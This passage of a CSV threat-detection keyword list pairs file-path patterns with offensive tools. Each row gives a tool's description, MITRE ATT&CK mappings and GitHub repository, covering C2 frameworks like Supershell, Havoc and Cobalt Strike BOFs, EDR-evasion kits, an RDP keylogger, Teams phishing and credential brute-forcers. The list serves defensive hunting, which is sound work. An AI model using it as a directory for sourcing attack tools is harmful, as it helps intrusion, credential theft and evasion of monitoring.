Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*/Suborner.git*,offensive_tool_keyword,Suborner,The Invisible Account Forger - A simple program to create a Windows account you will only know about ,T1098 - T1175 - T1033,TA0007 - TA0008 - TA0003,N/A,N/A,Persistence,https://github.com/r4wd3r/Suborner,1,1,N/A,N/A,5,452,58,2022-09-02T09:04:46Z,2022-04-26T00:12:58Z -*/sudo_tracer.c*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,0,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*/sudomy.api*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - 
T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,1,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -*/sullo/nikto*,offensive_tool_keyword,nikto,Nikto web scanner tool,T1210.001 - T1190 - T1046 - T1222,TA0007 - TA0002 - TA0001,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*/sunlogin_rce*,offensive_tool_keyword,POC,SunloginClient RCE vulnerable version,T1587,TA0001 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/sunlogin_rce,1,1,N/A,N/A,5,462,201,2022-02-16T16:11:42Z,2022-02-16T14:20:41Z -*/Sup3r-Us3r/scripts/*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*/supermicro-ipmi-conf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Supernova.exe*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,1,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*/Supernova.git*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,1,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*/SuperProfileDLL*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Supershell.tar.gz*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*/supershell/login/auth*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*/Supershell/releases*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*/suspendresume.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/suspendresume.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/svn-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SweetPotato_CS*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*/Synergy-httpx.git*,offensive_tool_keyword,Synergy-httpx,A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically,T1021.002 - T1105 - T1090,TA0002 - TA0011 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/t3l3machus/Synergy-httpx,1,1,N/A,8,2,108,14,2023-09-09T10:38:38Z,2023-06-02T10:06:41Z -*/syscalls/syscalls_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/syscalls/syswhispers/*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/syscalls/syswhispersv2*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/SyscallsInject/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 
- T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/SysmonQuiet*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,1,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*/SysWhispers2*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,1,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -*/SysWhispers3*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,1,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -*/SysWhispers3.git*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,1,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -*/syswhispersv2*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion 
Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/t3l3machus/Villain*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*/taidoor.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/TakeMyRDP*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*/Talon.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/Talon/*Agent/Source*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/target:exe spacerunner.cs*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*/targetedKerberoast*,offensive_tool_keyword,targetedKerberoast,Kerberoast with ACL abuse capabilities,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/ShutdownRepo/targetedKerberoast,1,1,N/A,N/A,3,254,43,2023-07-16T22:06:29Z,2021-08-02T20:19:35Z -*/targetedKerberoast.py*,offensive_tool_keyword,exegol,Fully 
featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/targets-asn.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-map4to6.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-multicast-echo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-multicast-invalid-dst.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-multicast-mld.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-multicast-slaac.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-wordlist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-sniffer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-traceroute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Tash.dll*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/TashClient.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/TashLoader.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/tccbypass.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/tcpshell.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*/Teamphisher.txt*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z 
-*/Teamphisher/targets.txt*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*/teamserver-linux.tar.gz*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/teamserver-win.zip*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/teamspeak2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/teamstracker.db*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,1,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -*/teamstracker.git*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - 